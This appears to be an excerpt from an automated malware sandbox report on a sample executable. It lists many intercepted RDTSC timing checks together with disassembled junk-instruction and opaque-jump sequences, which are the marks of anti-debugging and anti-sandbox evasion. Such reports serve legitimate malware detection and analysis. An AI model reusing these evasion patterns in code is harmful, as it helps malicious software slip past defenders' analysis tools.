Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9FFAF second address: E9FFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9FFB4 second address: E9FFBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9FFBC second address: E9FFC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9FFC6 second address: E9FFCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9FFCA second address: E9FFCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56E49 second address: E56E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56E5B second address: E56EF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39717h 0x00000008 jmp 00007F4BA0D39711h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F4BA0D39708h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d jo 00007F4BA0D3970Ch 0x00000033 xor edi, 46E59F1Ah 0x00000039 mov dh, ch 0x0000003b mov ebx, dword ptr [ebp+12481EF8h] 0x00000041 add eax, ebx 0x00000043 push 00000000h 0x00000045 push edx 0x00000046 call 00007F4BA0D39708h 0x0000004b pop edx 0x0000004c mov dword ptr [esp+04h], edx 0x00000050 add dword ptr [esp+04h], 00000018h 0x00000058 inc edx 0x00000059 push edx 0x0000005a ret 0x0000005b pop edx 0x0000005c ret 0x0000005d mov dword ptr [ebp+12467AE4h], edi 0x00000063 nop 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F4BA0D3970Dh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56EF6 second address: E56EFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56EFB second address: E56F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jc 00007F4BA0D39706h 0x00000010 js 00007F4BA0D39706h 0x00000016 popad 0x00000017 jnl 00007F4BA0D39708h 0x0000001d popad 0x0000001e nop 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007F4BA0D39708h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 push ebx 0x0000003a mov di, 3D32h 0x0000003e pop edx 0x0000003f sub edx, dword ptr [ebp+122D1E13h] 0x00000045 push 00000004h 0x00000047 mov edi, dword ptr [ebp+122D1F13h] 0x0000004d xor edx, 5DD72AF1h 0x00000053 nop 0x00000054 jmp 00007F4BA0D39713h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F4BA0D39713h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA06A2 second address: EA06A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA06A6 second address: EA06AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA06AC second address: EA06E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F160h 0x00000007 jnc 00007F4BA0D3F163h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F4BA0D3F162h 0x00000017 jnc 00007F4BA0D3F156h 0x0000001d jl 00007F4BA0D3F156h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA4392 second address: EA43CB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4BA0D39706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4BA0D3970Bh 0x0000000f jp 00007F4BA0D3971Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA40CC second address: EA40D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAA22A second address: EAA22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAA22F second address: EAA253 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F4BA0D3F164h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAA253 second address: EAA25D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAAB69 second address: EAAB6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAAB6D second address: EAAB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39711h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAAB86 second address: EAAB8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAAB8A second address: EAAB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAB16C second address: EAB198 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F4BA0D3F164h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4BA0D3F160h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAB198 second address: EAB19C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EABD28 second address: EABD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EABD2E second address: EABD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EABD32 second address: EABD36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EABD36 second address: EABD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EABD3F second address: EABD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Ah 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F4BA0D3F156h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EB4EC7 second address: EB4EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D39718h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EB4EE3 second address: EB4EE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EB4EE9 second address: EB4F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F4BA0D3970Eh 0x0000000c jno 00007F4BA0D39706h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jg 00007F4BA0D39706h 0x0000001d popad 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EB4F0A second address: EB4F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EB4F16 second address: EB4F2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39712h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EB50AF second address: EB50BE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EB50BE second address: EB50D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 ja 00007F4BA0D39708h 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EBFB6F second address: EBFB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F4BA0D3F156h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EBFB7E second address: EBFB82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EBFE17 second address: EBFE25 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EC04ED second address: EC04F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EC04F1 second address: EC04F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EC12F5 second address: EC1321 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4BA0D39726h 0x00000008 jmp 00007F4BA0D3970Dh 0x0000000d jmp 00007F4BA0D39713h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EC1321 second address: EC1327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EBF2F6 second address: EBF305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F4BA0D39706h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EBF305 second address: EBF30B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EBF30B second address: EBF311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EC685B second address: EC686C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3F156h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EC6B1D second address: EC6B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F4BA0D39706h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EC6B2D second address: EC6B31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED10D2 second address: ED10D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED10D6 second address: ED10DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED10DA second address: ED10EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D3970Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED10EF second address: ED10F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED10F3 second address: ED1109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39712h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED1109 second address: ED110F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED2BE2 second address: ED2BE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED2BE7 second address: ED2BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 js 00007F4BA0D3F15Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED2D3B second address: ED2D5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39714h 0x00000008 jnc 00007F4BA0D39706h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED534C second address: ED5352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED5352 second address: ED5356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED54CE second address: ED54DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F4BA0D3F156h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED54DB second address: ED54E5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4BA0D3970Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED54E5 second address: ED54F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F4BA0D3F15Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED9D18 second address: ED9D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jmp 00007F4BA0D3970Ch 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED9D34 second address: ED9D3E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED9D3E second address: ED9D45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EDF19E second address: EDF1B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F4BA0D3F158h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E08CF1 second address: E08CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EE8867 second address: EE8882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F4BA0D3F156h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EE8882 second address: EE8886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EEF95D second address: EEF964 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EEE31B second address: EEE325 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3970Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EF4081 second address: EF408C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F4BA0D3F156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F00124 second address: F00134 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4BA0D39706h 0x00000008 jo 00007F4BA0D39706h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F00134 second address: F0016E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jmp 00007F4BA0D3F165h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4BA0D3F166h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F0D65B second address: F0D65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F2549A second address: F254A4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4BA0D3F172h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F24524 second address: F24536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F24679 second address: F24681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F2493F second address: F24945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F24945 second address: F24949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F24D77 second address: F24D9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39716h 0x0000000d jng 00007F4BA0D39706h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F24EC3 second address: F24EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F4BA0D3F166h 0x0000000f pop eax 0x00000010 jc 00007F4BA0D3F15Eh 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 je 00007F4BA0D3F156h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jp 00007F4BA0D3F156h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F24EFE second address: F24F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jne 00007F4BA0D3970Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F2519E second address: F251A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F251A2 second address: F251C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39716h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F4BA0D39706h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F26B57 second address: F26B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F26B5D second address: F26B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F28388 second address: F2838E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F2823A second address: F28240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F2ABD3 second address: F2ABD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
